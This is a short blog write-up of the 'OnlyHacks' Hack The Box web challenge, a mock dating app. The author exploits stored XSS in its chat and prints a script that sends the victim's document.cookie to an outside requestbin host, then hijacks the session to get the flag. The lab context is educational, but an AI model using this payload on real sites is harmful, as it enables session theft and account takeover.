OnlyHacks HTB Challenge (English)

Challenge OnlyHacks HTB [Difuculty very easy]

Posted Apr 3, 2025

By Juan Belinchón

1 min read

OnlyHacks HTB Challenge (English)

Introduction

N/A

Machine Description

Name: OnlyHacks
Goal: Get the flag
Difficulty: very easy
Operating System: N/A
link: OnlyHacks

PDF Link

PDF: Link to PDF

Explotation

We have this page, apparently a date-app web. We can’t do nothing here until we register.

Afert we registered. We have a message section where we can chat with someone else.

After a match, I’m currently chating with a beautiful girl. Let’s try fall in love her with an XSS

Works. Now I’m going to hijack her cookie session:

Since we’re not using any vpn to stay in the same Web’s network we have to make the explotation via Internet, for that we can use this web: http://requestbin.whapi.cloud/17c5rx31

  
<script>
	var req = new XMLHttpRequest();
	req.open('GET', 'http://requestbin.whapi.cloud/xxxxxxxx/?cookie=' + document.cookie);
	req.send();
</script>

I send this payload and wait.

Then I receive the petition.

Finally we just change the cookie using dev tools and we can see that Reneta has been chating with others boys. We get the flag.

Challenge, HTB

web very easy

This post is licensed under CC BY 4.0 by the author.